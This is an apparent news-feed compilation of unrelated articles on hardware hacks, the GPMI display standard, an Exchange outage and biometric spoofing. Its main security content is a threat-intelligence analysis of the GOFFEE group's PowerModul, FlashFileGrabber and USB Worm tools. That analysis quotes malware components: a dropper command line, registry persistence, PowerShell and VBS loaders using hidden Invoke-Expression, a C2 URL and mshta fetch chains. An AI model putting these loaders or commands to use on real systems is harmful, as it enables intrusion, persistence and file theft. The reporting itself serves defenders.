Around these parts, we generally celebrate clever hacks that let you do more with less. So if somebody wrote in to tell us how they used multiplexing to drive the front panel of their latest gadget with fewer pins on the microcontroller than would normally be required, we’d be all over it. But what if that same hack ended up leading to a common failure in a piece of consumer hardware?

As [Jim] recently found out, that’s precisely what seems to be ailing the Meaco Arete dehumidifier. When his stopped working, some Internet searching uncovered the cause of the failure: if a segment in the cheap LED display dies and shorts out, the multiplexing scheme used to interface with the front panel essentially reads that as a stuck button and causes the microcontroller to lock up. He passed the info along to us as a cautionary tale of how over-optimization can come with a hidden cost down the line.

Judging by the thread from the Badcaps forum, the problem was identified last summer. But unless you had this particular dehumidifier and went searching for it, it’s not the kind of thing that you’d otherwise run into. The users start by going through the normal diagnostic steps, but come up short (no pun intended).
Given its simplicity, the front panel PCB was not an obvious failure point.
Eventually, user [CG2] resorts to buzzing out all the connections to the two digit seven-segment LED display on the front panel, and finds a dead short on one of the segments. After removing the display, the dehumidifier sprung back to life and everything worked as expected. It wasn’t hard to identify a suitable replacement display on AliExpress, and swapping it out brought the appliance back up to full functionality.

Now to be fair, a shorted out component is likely to cause havoc wherever it might be in the circuit, and as such perhaps it’s the lowest-bidder LED display with the unusually high failure rate that’s really to blame here. But it’s also more likely you’d interpret a dark display as a symptom of the problem rather than the cause, making this a particularly tricky failure to identify.

In any event, judging by how many people seem to be having the same problem, and the fact that there’s now an iFixit guide on how to replace the shorted display, it seems like this particular product was cost-optimized just a bit too far.

hackaday.com/2025/04/10/clever…

GOFFEE is a threat actor that first came to our attention in early 2022. Since then, we have observed malicious activities targeting exclusively entities located in the Russian Federation, leveraging spear phishing emails with a malicious attachment. Starting in May 2022 and up until summer of 2023, GOFFEE deployed modified Owowa (malicious IIS module) in their attacks. As of 2024, GOFFEE started to deploy patched malicious instances of explorer.exe via spear phishing.

During the second half of 2024, GOFFEE continued to launch targeted attacks against organizations in Russia, utilizing PowerTaskel, a non-public Mythic agent written in PowerShell, and introducing a new implant that we dubbed “PowerModul”. The targeted sectors included media and telecommunications, construction, government entities, and energy companies.

This report in a nutshell:

• GOFFEE updated distribution schemes.
• A previously undescribed implant dubbed PowerModul was introduced.
• GOFFEE is increasingly abandoning the use of PowerTaskel in favor of a binary Mythic agent for lateral movement.

For more information, please contact: intelreports@kaspersky.com

Technical details

Initial infection

Currently, several infection schemes are being used at the same time. The starting point is typically a phishing email with a malicious attachment, but the schemes diverge slightly from there. We will review two of them relevant at the time of the research.

The first infection scheme uses a RAR archive with an executable file masquerading as a document. In some cases, the file name uses a double extension, such as “.pdf.exe” or “.doc.exe”. When the user clicks the executable file, a decoy document is downloaded from the C2 and opened, while malicious activity is carried out in parallel.

Example of decoy document

The file itself is a Windows system file (explorer.exe or xpsrchvw.exe), with part of its code patched with a malicious shellcode. The shellcode is similar to what we saw in earlier attacks, but in addition contains an obfuscated Mythic agent, which immediately begins communicating with the command-and-control (C2) server.

Malware execution flow v1

In the second case, the RAR archive contains a Microsoft Office document with a macro that serves as a dropper.

Malware execution flow v2

Malicious document with a macro

When a document is opened, scrambled text and a warning image with the message, “This document was created in an earlier version of Microsoft Office Word. For Microsoft Office Word to display the contents correctly, click ‘Enable Content'”, are shown. Clicking “Enable Content” activates a macro that hides the warning image and restores the text through a normal character replacement operation. Additionally, the macro creates two files in the user’s current folder: an HTA and a PowerShell file, and writes the HTA into the registry using the “LOAD” registry value of the “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows” registry key.
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
"LOAD"="C:\Users\<USER_NAME>\UserCache.ini.hta"
Although the macro itself does not start anything or create new processes, the programs listed in the “LOAD” value of the registry key are run automatically for the currently logged-on user.

UserCache.ini.hta content

The malicious HTA runs a PowerShell script (PowerModul), but not directly. Instead, it first uses cmd.exe and output redirection to drop a JavaScript file named “UserCacheHelper.lnk.js” onto the disk, and then executes it. Only then does the dropped JavaScript run PowerModul:
cmd.exe /c if not exist "C:\Users\user\UserCacheHelper.lnk.js" echo var objService = GetObject("winmgmts:\\\\.\\root\\cimv2");var objStartup = objService.Get("Win32_ProcessStartup");var objConfig = objStartup.SpawnInstance_();objConfig.ShowWindow = 0;var processClass = objService.Get("Win32_Process");var command = "powershell.exe -c \"$raw= Get-Content C:\\Users\\user\\UserCache.ini;Invoke-Expression $raw\"";var result = processClass.Create(command, null, objConfig, 0); > C:\Users\user\UserCacheHelper.lnk.js
It is worth noting that “UserCache.ini.hta” and “UserCacheHelper.lnk.js” contain strings with full paths to the files, including the local user’s name, instead of environment variables. As a result, the control keys, as well as the file sizes, will vary depending on the current user’s name.

UserCacheHelper.lnk.js content

The “UserCacheHelper.lnk.js” file launches a PowerShell file named “UserCache.ini”, dropped by the initial macro. This file contains encoded PowerModul.

PowerModul

PowerModul is a PowerShell script capable of receiving and executing additional PowerShell scripts from the C2 server. The first instances of this implant’s usage were detected at the beginning of 2024. Initially, it was used to download and launch the PowerTaskel implant, and was considered a relatively minor component for launching PowerTaskel. However, its use of a unique protocol, distinct payload types, and a C2 server different from PowerTaskel’s led us to classify it as a separate family.

UserCache.ini content

In the scheme being described, the PowerModul code is embedded in the “UserCache.ini” file as a Base64-encoded string. The beginning and end of the decoded script are shown in the images below, while the middle section contains a copy of the HTA file, as well as code responsible for dropping the HTA file onto the disk, writing it to the registry, and hiding the file by changing its attributes to “Hidden”. Essentially, this code replicates part of the functionality of the VBA macro found in the Word document, except for file hiding, which was not implemented in VBA.

Beginning of PowerModul

End of PowerModul

When accessing the C2, PowerModul appends an infected system identifier string to the C2 URL, consisting of the computer name, username, and disk serial number, separated with underscores:
hxxp://62.113.114[.]117/api/texts/{computer_name}_{username}_{serial_number}
The response from the C2 is in XML format, complete with scripts encoded in Base64:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/plain
Content-Length: 35373
Connection: keep-alive

<Configs>
<Config>
<Module>ZnVuY3Rpb24gQ3JlYXRlVkJTRmlsZSgkYkJkcmxzRCwgJGlMc1FybVQsIC....==</Module>
<CountRuns>250</CountRuns>
<Interval>1</Interval>
</Config>
<Config>
<Module>ZnVuY3Rpb24gUnVuKCl7DQokaWQgPSBnZXQtcmFuZG9tDQokY29kZSA9I...</Module>
There is an additional, previously undescribed function in PowerModul, named “OfflineWorker()”. It decodes a predefined string and executes its contents. In the instance shown in the screenshots above, the string to be decoded is empty, and therefore, nothing is executed. However, we have observed cases where the string contained content. An example of the OfflineWorker() function containing the FlashFileGrabber data stealing tool code is shown below:
function OfflineWorker() {
try{
$___offlineFlash = 'ZnVuY3Rpb24gUnVuKCl7DQokaWQgPSBnZXQtcmFuZG9tDQokY29kZSA9IE…….=';

if($___offlineFlash -ne ''){
$___flashOfflineDecoded = FromBase64 $___offlineFlash;
Invoke-Expression($___flashOfflineDecoded);
}
}
catch{}
}
The payloads used by PowerModul include the PowerTaskel, FlashFileGrabber, and USB Worm tools.

FlashFileGrabber

As its name suggests, FlashFileGrabber is designed to steal files from removable media, such as flash drives. We have identified two variants: FlashFileGrabber and FlashFileGrabberOffline.

FlashFileGrabberOffline main routine

FlashFileGrabberOffline searches removable media for files with specific extensions, and when found, copies them to the local disk. To accomplish this, it creates a series of subdirectories in the TEMP folder, following the template “%TEMP%\CacheStore\connect\<VolumeSerialNumber>\”. The folder names “CacheStore” and “connect” are hardcoded within the script. Examples of such paths are provided below:
%TEMP%\CacheStore\connect\62431103\2024\some.pdf
%TEMP%\CacheStore\connect\62431103\Documents\some.docx
%TEMP%\CacheStore\connect\62431103\attachment.jpg
%TEMP%\CacheStore\connect\6c1d1372\Print\resume.docx
Additionally, a file named “ftree.db” is created at the path specified in the template, which stores metadata for the copied files, including the full path to the original file, its size, and dates of last access and modification. Furthermore, in the “%AppData%” folder, the “internal_profiles.db” file is created, storing the MD5 sums of the aforementioned metadata. This allows the malware to avoid copying the same files more than once:
%TEMP%\CacheStore\connect\<VolumeSerialNumber>\ftree.db
%AppData%\internal_profiles.db
The list of file extensions of interest is as follows:

FlashFileGrabber largely duplicates the functionality of FlashFileGrabberOffline, but with one key difference: it is capable of sending files to the C2 server.

FlashFileGrabber’s routines

USB Worm

USB Worm is capable of infecting removable media with a copy of PowerModul. To achieve this, the worm renames the files on the removable disk with a random name, retaining their original extension, and assigns them the “Hidden” file attribute. The “UserCache.ini” file, which contains PowerModul, is then copied to the folder with the original file.

USB Worm main routine

Additionally, the worm creates hidden VBS and batch files to launch PowerModul and open a decoy document.

CreateVBSFile() and CreateBatFile() functions

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run Chr(34) & ".\zermndzg.bat" & Chr(34), 0, False
WshShell.Run Chr(34) & ".\zermndzg.docx" & Chr(34), 1, False
Set WshShell = Nothing
Example of the contents of a malicious VBS
powershell -exec bypass -windowstyle hidden -nop -c "$raw= [io.file]::ReadAllText(""".\UserCache.ini"""); iex $raw;"
Example of the contents of a malicious batch file

A shortcut is also created with the original name of the decoy document, which, when launched, executes the VBS file.

CreateShortcutForFile() function

To disguise the shortcut, the worm assigns an icon from the shell32.dll library, depending on the extension of the original file. The worm limits the number of documents replaced with shortcuts to five, selecting only the most recently accessed files by sorting them according to their LastAccessTime attribute.

System infection scheme via removable media

PowerTaskel

We have dubbed the non-public PowerShell Mythic agent delivered via a mail-based infection chain since early 2023, as PowerTaskel. This implant possesses only two primary capabilities: sending information about the targeted environment to a C2 server in the form of a “checkin” message, and executing arbitrary PowerShell scripts and commands received from the C2 server as “tasks” in response to “get_tasking” requests from the implant. The request payloads are PowerShell objects that are serialized to XML, encoded using XOR with a sample-specific 1-byte key, and then converted to Base64.

Based on the naming and ordering of the configuration parameters, it is likely that PowerTaskel is derived from the open-source Medusa Mythic agent, which was originally written in Python.

Comparison of Medusa and PowerTaskel configuration code

Comparison of Medusa and PowerTaskel “checkin” function code

PowerTaskel is a fully functional agent capable of executing commands and PowerShell scripts, which expand its capabilities to downloading and uploading files, running processes, etc. However, its functionality is often insufficient due to specific aspects of PowerShell usage, prompting the group to switch to a custom binary Mythic agent. To achieve this, PowerTaskel loads the Mythic agent from the C2 server, injects it into its own process memory, and runs it in a separate thread. In this scenario, the Mythic agent is present as a self-configuring x32/x64 shellcode. The method of injecting and loading the Mythic agent shellcode is described in more detail in the “Lateral Movement” section.

In at least one instance, PowerTaskel received a script containing a FolderFileGrabber component as a task. FolderFileGrabber largely replicates the functionality of FlashFileGrabber, with one key difference: it can grab files from remote systems via a hardcoded network path using the SMB protocol. The PowerShell cmdlet “New-SmbMapping” is used to access remote system resources, enabling successful retrieval of the desired files.

Lateral movement

Following system infection, if the user account permissions allow it, PowerTaskel performs several tasks to elevate its privileges to the System level. To achieve this, PowerTaskel utilizes the PsExec utility, which is part of the Sysinternals suite. The PsExec utility is dropped into the current directory where PowerTaskel is located and is used to execute mshta.exe with system privileges, passing a URL as an argument.

The images below depict two tasks that PowerTaskel executes with its C2 server. The first task checks for the presence of the file “ntuser.exe” in the %ProgramData% directory, and if it is not found, downloads it from the C2 server. The second task runs mshta.exe via ntuser.exe, which is actually a renamed PsExec utility.

Getting “ntuser.exe”

The “ntuser.exe” executable running “mshta.exe”

The next image illustrates an example of the execution flow of various scripts and commands started with the privilege elevation procedure. The executable file “1cv9.exe” is a renamed PsExec utility, and the argument “-s” specifies that the process it launches should run under the System account. The launched program “mshta.exe” accepts a URL as an argument, which points to an HTA file containing malicious, obfuscated JScript. The HTA file is cached and saved to the InetCache folder. This JScript creates two files, “desktop.js” and “user.txt”, on the disk using the “echo” console command with output redirection to a file, and then executes desktop.js via cscript.exe. The desktop.js file, in turn, launches the interpreter with a script on the command line, which reads the contents of user.txt and executes it. As evident from the contents passed to the “echo” command, user.txt is another PowerShell script whose task is to extract a payload from a hardcoded address and execute it. In this case, the payload is PowerTaskel, which now runs with the elevated privileges.

Example of execution flow on an infected system

Once launched, PowerTaskel interacts with its C2 server and executes standard commands to gather information about the system and environment. Notably, the launch of csc.exe (Visual C# Command Line Compiler) indicates that PowerTaskel has received a task to load a shellcode, which it accomplishes using an auxiliary DLL. The primary function of this DLL is to copy the shellcode into allocated memory. In our case, the shellcode is self-configuring code for the binary Mythic agent.

The final line of the execution flow (“hxxp://192.168.1[.]2:5985/wsman”) reveals a call to the WinRM (Microsoft Windows Remote Management) service, located on a remote host on the local network, via the loaded Mythic agent. A specific User-Agent header value, “Ruby WinRM Client”, is used to access the WinRM service.

HTTP header for WinRM request

The WinRM service is actively utilized by GOFFEE for network distribution purposes. Typically, this involves launching the mshta.exe utility on the remote host with a URL as an argument. The following examples illustrate the execution chains observed on remote hosts:
wmiprvse.exe -secured -Embedding
-> cmd.exe /C mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wsmprovhost.exe
-> mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wmiprvse.exe -secured -Embedding
-> cmd.exe /Q /c powershell.exe mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wmiprvse.exe -secured -Embedding
-> powershell.exe /C mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta
Recently, we have observed that GOFFEE is increasingly abandoning the use of PowerTaskel in favor of the binary Mythic agent during lateral movement.

Mythic agent HTA

The mshta.exe utility is still employed to launch the binary Mythic agent, with a URL passed as an argument. However, the payload contents for the passed URL differ from the traditional HTA format. It is relatively large, approximately 180 kilobytes, and is characterized as a polyglot file, which is a type of file that can be validly interpreted in multiple formats. The shellcode containing the Mythic agent is located at the beginning of the file and occupies approximately 80% of its size. It is followed by two Base64-encoded PowerShell scripts, separated by a regular line break, and finally, the HTA file itself.

Polyglot payload

When the mshta.exe utility downloads the aforementioned payload, it interprets it as an HTA file and transfers control to an obfuscated JScript embedded within the HTA section of the polyglot file. The script first determines the argument used to launch the mshta.exe utility, whether it was a URL or a path to a local file. If a URL was used as the argument, the script searches for the original HTA file in the InetCache folder, where the system cached the HTA file during download. To do this, the script iterates through all files in the cache folder and checks their contents for the presence of a specific magic string.

Deobfuscated JScript from the HTA section of the payload

If an HTA file is found on the disk, the script drops two files, “settings.js” and “settings.ps1”, using the “echo” command, and then runs settings.js with additional command-line arguments. The script then sets a timer for 10 seconds, after which the dropped files will be deleted.

Deobfuscated “settings.js”

The running settings.js script accepts three command-line arguments: the path to powershell.exe, the path to the HTA file, and the string “Shell.Application”. These received arguments are used to populate a PowerShell script, the contents of which are then passed to the powershell.exe command line.
powershell.exe -c "$INbqDKHp = \"C:\\\\Users\\\\[username]\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\duplicate````[1````].hta\";$OdfUfjp = get-content $env:USERPROFILE\\settings.ps1;$KWfWXqek=1;Invoke-Expression $OdfUfjp;$KWfWXqek=2;Invoke-Expression $OdfUfjp;$KWfWXqek=3;Invoke-Expression $OdfUfjp;"
The script passed to the PowerShell interpreter declares two variables: “$INbqDKHp”, which stores the path to the HTA file, and “$KWfWXqek”, a counter. The script then reads the contents of “settings.ps1” and executes it three times, passing the path to the HTA file and the counter as arguments, and incrementing the value of the “$KWfWXqek” variable by 1 each time.

Deobfuscated “settings.ps1”

During each execution, the “settings.ps1” script reads the contents of the HTA file, splits it into lines, and identifies Base64-encoded scripts. To detect these scripts, it first locates the line containing the HTA application tag by searching for the substring “<HTA:APPLICATION”. The three lines preceding this tag contain Base64-encoded scripts. Depending on the value of the “$KWfWXqek” counter, the script executes the corresponding Base64-encoded script.
The first two scripts are used to declare auxiliary functions, including compiling a helper DLL, which is necessary for executing the shellcode. The third script is responsible for allocating memory, loading the shellcode from the HTA file (whose path is retrieved from the previously defined “$INbqDKHp” variable), and transferring control to the loaded shellcode, which is the self-configuring code of the Mythic agent.

Victims

According to our telemetry, the identified targets of the malicious activities described in this article are located in Russia, with observed activity spanning from July 2024 to December 2024. The targeted industries are diverse, encompassing organizations in the mass media and telecommunications sectors, construction, government entities, and energy companies.

Attribution

In this campaign, the attacker utilized PowerTaskel, which had previously been linked to the GOFFEE group. Additionally, HTA files and various scripts were employed in the infection chain.

The malicious executable attached to the spear phishing email is a patched version of explorer.exe, similar to what we observed in GOFFEE’s attacks earlier in 2024, and contains shellcode that is very similar to the one previously used by GOFFEE.

Considering the same victimology, we can attribute this campaign to GOFFEE with a high degree of confidence.

Conclusions

Despite using similar tools and techniques, GOFFEE introduced several notable changes in this campaign.

For the first time, they employed Word documents with malicious VBA scripts for initial infection. Additionally, GOFFEE utilized a new PowerShell script downloader, PowerModul, to download PowerTaskel, FlashFileGrabber, and USB Worm. They also began using the binary Mythic agent, and likely developed their own implementations in PowerShell and C.

While GOFFEE continues to refine their existing tools and introduce new ones, these changes are not significant enough to suggest that they can be confused with another actor.

securelist.com/goffee-apt-new-…

The tech press has been full of announcements over the last day or two regarding GPMI. It’s a new standard with the backing of a range of Chinese hardware companies, for a high-speed digital video interface to rival HDMI. The Chinese semiconductor company HiSilicon have a whitepaper on the subject (Chinese language, Google Translate link), promising a tremendously higher data rate than HDMI, power delivery well exceeding that of USB-C, and interestingly, bi-directional data transfer. Is HDMI dead? Probably not, but the next few years will bring us some interesting hardware as they respond to this upstart.

Reading through pages of marketing from all over the web on this topic, it appears to be an early part of the push for 8k video content. There’s a small part of us that wonders just how far we can push display resolution beyond that of our eyes without it becoming just a marketing gimmick, but it is true to say that there is demand for higher-bandwidth interfaces. Reports mention two plug styles: a GPMI-specific one and a USB-C one. We expect the latter to naturally dominate. In terms of adoption, though, and whether users might find themselves left behind with the wrong interface, we would expect that far from needing to buy new equipment, we’ll find that support comes gradually with fallback to existing standards such as DisplayPort over USB-C, such that we hardly notice the transition.

Nearly a decade ago we marked the passing of VGA. We don’t expect to be doing the same for HDMI any time soon in the light of GPMI.

hackaday.com/2025/04/10/everyo…

Un’interruzione di carattere globale ha impedito agli amministratori di accedere a Exchange Admin Center (EAC). Il problema è stato messo immediatamente sotto indagine da parte di Microsoft. Da quando è avvenuta l’interruzione nella giornata di ieri, gli amministratori IT interessati hanno segnalato errori HTTP 500 quando tentavano di accedere al portale dell’interfaccia di amministrazione di Exchange.

Microsoft ha riportato che il problema è critico, il quale è stato portato all’attenzione con il bollettino EX1051697 relativo all’Interfaccia di amministrazione di Microsoft 365. Tuttavia, come suggerito anche da Microsoft, alcuni amministratori sono riusciti ad accedere al centro di amministrazione tramite la url admin.cloud.microsoft/exchange…

Microsoft ha affermato quanto segue: “Abbiamo identificato un aumento dei picchi di errore e stiamo indagando ulteriormente. Inoltre, stiamo esaminando le recenti modifiche apportate al servizio come possibile causa principale”. In un successivo aggiornamento del centro messaggi, Redmond ha affermato che i suoi ingegneri hanno riprodotto internamente il problema e raccolto ulteriori dati diagnostici per agevolare il processo di risoluzione dei problemi.

Per far fronte a questo problema, Microsoft ha iniziato a reindirizzare automaticamente gli amministratori all’URL funzionante come soluzione alternativa temporanea. Successivamente Microsoft ha riportato quanto segue: “Abbiamo identificato un potenziale problema di autenticazione in un percorso URL specifico e stiamo lavorando per mitigare il problema reindirizzando il traffico URL interessato a un URL funzionante”, ha affermato l’azienda in un aggiornamento dell’Interfaccia di amministrazione di Microsoft 365.

Al momento il problema è stato sanato da Microsoft e il servizio ha ripreso a funzionare regolarmente.

L'articolo HTTP 500 su Exchange Admin Center: blackout mondiale, amministratori bloccati! proviene da il blog della sicurezza informatica.

Se ti violano la password, cambi la password. Se ti violano l’impronta digitale, non puoi cambiare il dito.

Fatta questa doverosa premessa, l’autenticazione biometrica sta sostituendo attivamente le password e i codici PIN tradizionali, offrendo un metodo più comodo e, come comunemente si ritiene e affidabile per confermare l’identità. Le impronte digitali, i tratti del viso, la voce e perfino la forma delle orecchie sono diventati parte del moderno panorama digitale.

Tuttavia, la rapida diffusione di tali tecnologie non è stata priva di conseguenze: oltre alla comodità, è aumentato anche il livello di abuso. L’interesse criminale per la biometria non è più ipotetico: i criminali sfruttano sempre più le sue vulnerabilità in attacchi reali.

Secondo i dati di Europol, il numero di casi legati all’inganno dei sistemi biometrici è aumentato in modo significativo. L’attenzione principale degli aggressori è rivolta ai cosiddetti attacchi di presentazione. La loro essenza è la falsificazione o l’imitazione delle caratteristiche biometriche allo scopo di ingannare il sistema di autenticazione.

Un esempio semplice potrebbe essere una replica in silicone di un’impronta digitale realizzata a partire da una fotografia o da un campione fisico. Tali falsi possono essere realizzati in casa utilizzando materiali facilmente reperibili; le moderne stampanti 3D consentono di creare repliche ancora più precise.

Anche i sistemi di riconoscimento facciale si stanno rivelando vulnerabili. I criminali utilizzano maschere in silicone, trucco, algoritmi di morphing software e tecnologie deepfake. Questi ultimi consentono non solo di modificare l’immagine, ma anche di sintetizzare la voce, imitando il discorso di una determinata persona.

Tali metodi vengono utilizzati attivamente per aggirare i sistemi di sicurezza, anche nei servizi bancari e governativi. Ad esempio, si sono verificati casi in cui i deepfake sono stati utilizzati per aggirare l’identificazione nei sistemi di servizi remoti. Come osserva Europol, il vettore dell’abuso non è più limitato alla falsificazione dei dati. Ciò include anche l’estrazione di profili biometrici che possono essere utilizzati a fini di tracciamento, ricatto o addirittura monitoraggio di massa.

Le tecnologie progettate per rafforzare la sicurezza si trasformano in un mezzo di attacco nelle mani dei criminali. Inoltre, una volta compromessi, i dati biometrici non possono essere sostituiti: a differenza di una password, un’impronta digitale o la forma del viso rimangono invariate per tutta la vita.

Per contrastare le nuove minacce Le forze dell’ordine devono andare oltre la risposta tradizionale. Europol sottolinea l’importanza di una stretta collaborazione con ricercatori ed esperti di sicurezza. Lavorando insieme possiamo non solo prevedere i vettori di attacco, ma anche implementare rapidamente misure di protezione. Ciò include il monitoraggio delle minacce, gli aggiornamenti tempestivi degli algoritmi e l’etichettatura e l’analisi obbligatorie degli incidenti correlati all’aggiramento dei sistemi biometrici.

Si propone di prestare particolare attenzione alla sensibilizzazione degli agenti di polizia, degli esperti investigativi e degli specialisti tecnici. Comprendere le specificità degli attacchi biometrici, essere in grado di riconoscere le tracce del loro utilizzo ed essere in grado di lavorare con i dati biometrici durante le indagini sta diventando di fondamentale importanza. Non si tratta solo di proteggere i sistemi, ma anche della qualificazione giuridica di tali reati, che è ancora ben lungi dall’essere perfetta.

Il rapporto di Europol sottolinea che senza una risposta adeguata da parte delle forze dell’ordine, la società rischia di perdere fiducia nella biometria come tecnologia del futuro. In un contesto in cui la criminalità informatica sta raggiungendo nuovi livelli, non servono solo soluzioni tecniche, ma anche l’elaborazione di una strategia chiara che unisca gli sforzi dello Stato, delle imprese e della comunità scientifica. Questo è l’unico modo per mantenere l’equilibrio tra sicurezza e praticità, che era originariamente al centro degli sviluppi biometrici.

L'articolo Il Mito della Biometria Sicura! La Verità Shock sui Nuovi Attacchi Digitali proviene da il blog della sicurezza informatica.

Normally, videos over at The Signal Path channel on YouTube have a certain vibe, namely teardowns and deep dives into high-end test equipment for the microwave realm. And while we always love to see that kind of content, this hop into the world of cryogenics and liquid oxygen production shows that [Shahriar] has other interests, too.

Of course, to make liquid oxygen, one must first have oxygen. While it would be easy enough to get a tank of the stuff from a gas supplier, where’s the fun in that? So [Shahriar] started his quest with a cheap-ish off-the-shelf oxygen concentrator, one that uses the pressure-swing adsorption cycle we saw used to great effect with DIY O₂ concentrators in the early days of the pandemic. Although analysis of the machine’s output revealed it wasn’t quite as capable as advertised, it still put out enough reasonably pure oxygen for the job at hand.

The next step in making liquid oxygen is cooling it, and for that job [Shahriar] turned to the cryocooler from a superconducting RF filter, a toy we’re keen to see more about in the future. For now, he was able to harvest the Stirling-cycle cryocooler and rig it up in a test stand with ample forced-air cooling for the heat rejection end and a manifold to supply a constant flow of oxygen from the concentrator. Strategically placed diodes were used to monitor the temperature at the cold end, a technique we can’t recall seeing before. Once powered up, the cryocooler got down to the 77 Kelvin range quite quickly, and within an hour, [Shahriar] had at least a hundred milliliters of lovely pale blue fluid that passed all the usual tests.

While we’ve seen a few attempts to make liquid nitrogen before, this might be the first time we’ve seen anyone make liquid oxygen. Hats off to [Shahriar] for the effort.

youtube.com/embed/kakZ_fhfUHU?…

hackaday.com/2025/04/09/making…

Vibe coding is the buzzword of the moment. What is it? The practice of writing software by describing the problem to an AI large language model and using the code it generates. It’s not quite as simple as just letting the AI do your work for you because the developer is supposed to spend time honing and testing the result, and its proponents claim it gives a much more interactive and less tedious coding experience. Here at Hackaday, we are pleased to see the rest of the world catch up, because back in 2023, we were the first mainstream hardware hacking news website to embrace it, to deal with a breakfast-related emergency.

Jokes aside, though, the fad for vibe coding is something which should be taken seriously, because it’s seemingly being used in enough places that vibe coded software will inevitably affect our lives. So here’s the Ask Hackaday: is this a clever and useful tool for making better software more quickly, or a dangerous tool for creating software nobody quite understands, containing bugs which could cause a disaster?

Our approach to writing software has always been one of incrementally building something from the ground up, which satisfies the need. Readers will know that feeling of being in touch with how a project works at all levels, with a nose for immediately diagnosing any problems that might occur. If an AI writes the code for us, the feeling is that we might lose that connection, and inevitably this will lead to less experienced coders quickly getting out of their depth. Is this pessimism, or the grizzled voice of experience? We’d love to know your views in the comments. Are our new AI overlords the new senior developers? Or are they the worst summer interns ever?

hackaday.com/2025/04/09/ask-ha…

[BorisDigital] was mesmerised by a modern elevator. He decided to see how hard it would be to design his own elevator based on Raspberry Pis. He started out with a panel for the elevator and a call panel for the elevator lobby. Of course, he would really need three call panels since he is pretending to have a three-floor building.

It all looks very professional, and he has lots of bells and whistles, including an actual alarm. With the control system perfected, it was time to think about the hydraulics and mechanical parts to make a door and an actual lift.

It is still just a model, but he does have 10A AC switches for the pumps. Everything talks via MQTT over WiFi. There’s also a web-based control dashboard. We didn’t count how many Pi boards are in the whole system, but it is definitely more than three.

If you are wondering why this was built, we are too. But then again, we never really need an excuse to go off on some project, so we can’t throw stones.

Want to see a more practical build? Check it out. Perhaps he’ll start on an escalator next.

youtube.com/embed/eTpAalJFUlY?…

hackaday.com/2025/04/09/going-…

This week, Jonathan Bennett and Rob Campbell talk to Stéphane Graber about LXC, Linux Containers, and Incus! Why did Incus fork from LXD, why are Fortune 500 companies embracing it, and why might it make sense for your home lab setup? Watch to find out!

• stgraber.org/feed/
• Incus: linuxcontainers.org/incus
• Online demo: linuxcontainers.org/incus/try-…
• github.com/lxc/incus
• Incus Deploy: github.com/lxc/incus-deploy
• Incus OS: github.com/lxc/incus-os
• Terraform Provider: github.com/lxc/terraform-provi…
• Migration Manager: github.com/futurfusion/migrati…

youtube.com/embed/tiS7QU4ABnY?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:

• Spotify
• RSS

Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License

hackaday.com/2025/04/09/floss-…

The phones most of us carry around in our pockets every day hold a surprising amount of computing power. It’s somewhat taken for granted now that we can get broadband in our hands in most places; so much so that when one of these devices has reached the end of its life it’s often just tossed in a junk drawer even though its capabilities would have been miraculous only 20 years ago. But those old phones can still be put to good use though, and [Denys] puts a few of them back to work running a computing cluster.

Perhaps the most significant flaw of smartphones, though, is that most of them are locked down so much by their manufacturers that it’s impossible to load new operating systems on them. For this project you’ll need to be lucky enough (or informed enough) to have a phone with an unlockable bootloader so that a smartphone-oriented Linux distribution called postmarketOS can be installed. With this nearly full-fledged Linux distribution to work from, the phones can be accessed by ssh and then used to run Kubernetes for the computing cluster. [Denys] has three phones in his cluster that run a few self-hosted services for him.

[Denys] also points out in his guide that having a phone that can run postmarketOS might save some money when compared to buying a Raspberry Pi to run the same service, and the phones themselves can often be more powerful as well. This is actually something that a few others have noted in the past as well. He’s gone into a considerable amount of detail on how to set this up, so if you have a few old smartphones gathering dust, or even those with broken screens or other physical problems where the underlying computing resources are still usable, it’s a great way to put these machines back to work.

Thanks to [mastro Gippo] for the tip!

hackaday.com/2025/04/09/self-h…

Ever wanted your own X-ray machine? Of course you have! Many of us were indoctrinated with enticing ads for X-ray specs and if you like to see what’s inside things, what’s better than a machine that looks inside things? [Hyperspace Pirate] agrees, and he shows you the dangers of having your own X-ray machine in the video below.

The project starts with an X-ray tube and a high voltage supply. The tube takes around 70,000 volts which means you need a pretty stout supply, an interesting 3D printed resistor, and some mineral oil.

The output display? A normal camera. You also need an intensifying screen, which is just a screen with phosphor or something similar. He eventually puts everything in lead and reminds you that this is a very dangerous project and you should probably skip it unless you are certain you know how to deal with X-ray dangers.

Overall, looks like a fun project. But if you want real credit, do like [Harry Simmons] and blow your own X-ray tube, too. We see people build similar machines from time to time. You shouldn’t, but if you do, remember to be careful and to tell us about it!

youtube.com/embed/4NRkFqeO27Y?…

hackaday.com/2025/04/09/you-sh…

The first Philadelphia Maker Faire was extremely impressive, and seemed poised to be one of the premier maker events on the East Coast. Unfortunately, it had the misfortune of happening just a few months before COVID-19 made such events impossible. Robbed of all its momentum, the event tried out different venues after the shadow of the pandemic was gone, but struggled to meet the high bar set by that inaugural outing.

But after attending the the 2025 Philadelphia Maker Faire this past weekend, I can confidently say the organizers have moved the needle forward. This year marks the second time the event has been held at the Cherry Street Pier, a mixed-use public space with an artistic bent that not only lends itself perfectly to the spirit of Maker Faire but offers room for expansion in the future. The pier was packed with fascinating exhibits and excited attendees, and when the dust settled, everyone I spoke to was thrilled with how the day went and felt extremely positive about the future of the Faire.

Providing coverage of an event like this is always difficult, as there’s simply no way I could adequately describe everything there was to see and do. The following represents just a few of the projects that caught my eye; to see all that the Philadelphia Maker Faire has to offer, I’d strongly suggest you make the trip out in 2026.

Wasteworld Toys

